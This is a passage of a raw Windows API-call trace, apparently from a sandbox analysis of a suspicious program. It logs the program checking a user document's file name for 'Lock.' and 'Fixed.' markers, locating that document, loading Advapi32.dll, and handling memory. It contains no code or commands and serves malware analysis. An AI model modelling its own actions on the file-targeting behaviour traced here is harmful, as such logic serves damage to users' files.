(Locale=0x400, dwCmpFlags=0x1, lpString1="4zK0AkB79QVLka.rtf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0263.555] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="zK0AkB79QVLka.rtf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0263.555] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="K0AkB79QVLka.rtf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0263.555] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0AkB79QVLka.rtf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0263.555] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AkB79QVLka.rtf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0263.555] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kB79QVLka.rtf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0263.555] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B79QVLka.rtf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0263.555] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="79QVLka.rtf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0263.555] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9QVLka.rtf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0263.555] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QVLka.rtf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0263.555] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VLka.rtf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0263.555] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Lka.rtf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0263.556] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ka.rtf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0263.556] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="a.rtf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0263.556] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0263.556] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0263.556] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0263.556] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0263.556] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0263.556] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0263.556] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0263.556] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d760 [0263.556] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0263.556] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0263.556] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0263.557] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0263.557] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0263.557] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0263.557] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0263.557] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0263.557] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0263.557] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0263.557] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0263.557] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0263.557] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0263.557] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0263.557] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0263.557] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0263.558] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0263.558] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0263.558] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17d8 [0263.558] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x28) returned 0x249f1d0 [0263.558] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bc8 [0263.558] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="M4zK0AkB79QVLka.rtf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0263.558] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4zK0AkB79QVLka.rtf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0263.558] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="zK0AkB79QVLka.rtf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0263.558] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="K0AkB79QVLka.rtf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0263.558] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0AkB79QVLka.rtf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0263.558] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AkB79QVLka.rtf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0263.558] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kB79QVLka.rtf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0263.558] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B79QVLka.rtf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0263.559] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="79QVLka.rtf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0263.559] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9QVLka.rtf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0263.559] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QVLka.rtf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0263.559] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VLka.rtf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0263.559] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Lka.rtf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0263.559] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ka.rtf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0263.559] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0263.559] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x30) returned 0x24b3538 [0263.559] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0263.559] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3538 | out: hHeap=0x25c0000) returned 1 [0263.559] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0263.559] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0263.559] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0263.559] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0263.560] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0263.560] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0263.560] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0263.560] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0263.560] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18d8 [0263.560] CharUpperBuffW (in: lpsz="A0F00600E09", cchLength=0xb | out: lpsz="A0F00600E09") returned 0xb [0263.560] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0263.560] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0263.560] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0263.560] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9708 [0263.560] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0263.561] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0263.561] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0263.561] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0263.561] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa110 [0263.561] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0263.561] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0263.561] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0263.561] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0263.561] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0263.561] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0263.561] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0263.561] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0263.561] CharUpperBuffW (in: lpsz="SSA0F00600E09", cchLength=0xd | out: lpsz="SSA0F00600E09") returned 0xd [0263.561] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0263.562] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0263.562] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0263.562] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0263.562] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0263.562] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0263.562] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0263.562] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0263.562] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0263.562] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0263.562] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0263.562] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0263.562] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0263.562] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents/M4zK0AkB79QVLka.rtf", lpFindFileData=0x8bf178 | out: lpFindFileData=0x8bf178*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x141dbd0, ftCreationTime.dwHighDateTime=0x1d4d2f9, ftLastAccessTime.dwLowDateTime=0x7942c00, ftLastAccessTime.dwHighDateTime=0x1d4c5c4, ftLastWriteTime.dwLowDateTime=0x7942c00, ftLastWriteTime.dwHighDateTime=0x1d4c5c4, nFileSizeHigh=0x0, nFileSizeLow=0x152ef, dwReserved0=0xa070047, dwReserved1=0x25938, cFileName="M4zK0AkB79QVLka.rtf", cAlternateFileName="M4ZK0A~1.RTF")) returned 0xaa59a0 [0263.563] FindClose (in: hFindFile=0xaa59a0 | out: hFindFile=0xaa59a0) returned 1 [0263.563] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0263.563] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0263.563] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0263.563] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0263.563] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0263.563] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0263.563] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0263.563] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0263.563] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0263.563] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0263.564] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0263.564] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0263.564] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0263.564] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0263.564] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0263.564] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0263.564] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0263.564] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0263.564] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0263.564] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0263.564] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0263.564] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0263.564] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0263.565] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0263.565] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0263.565] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0263.565] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0263.565] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0263.565] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0263.565] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0263.565] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0263.565] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0263.565] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0263.565] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0263.565] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0263.565] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0263.565] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0263.566] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0263.566] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0263.566] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0263.566] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74d40000 [0263.566] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0263.566] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0263.566] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0263.566] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0263.566] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0263.566] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0263.566] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0263.566] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0263.566] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0263.567] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0263.567] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0263.567] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0263.567] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0263.567] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0263.567] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0263.567] CharUpperBuffW (in: lpsz="A5500B04258", cchLength=0xb | out: lpsz="A5500B04258") returned 0xb [0263.567] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0263.567] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0263.567] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0263.567] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b17f8 [0263.567] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0263.567] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0263.567] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0263.568] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0263.568] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa158 [0263.568] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0263.568] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0263.568] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0263.568] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0263.568] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0263.568] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0263.568] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0263.568] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0263.568] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0263.568] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0263.568] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0263.569] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0263.569] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0263.569] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0263.569] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0263.569] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0263.569] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0263.569] CharUpperBuffW (in: lpsz="SSA5500B04258", cchLength=0xd | out: lpsz="SSA5500B04258") returned 0xd [0263.569] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0263.569] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0263.569] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0263.569] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0263.569] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0263.569] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0263.570] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0263.570] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0263.570] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0263.570] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0263.570] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0263.570] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0263.570] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0263.570] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0263.570] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0263.570] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0263.570] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0263.570] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0263.570] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0263.570] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0263.570] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0263.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0263.571] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0263.571] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0263.571] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0263.571] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0263.571] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0263.571] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0263.571] HeapFree (in: 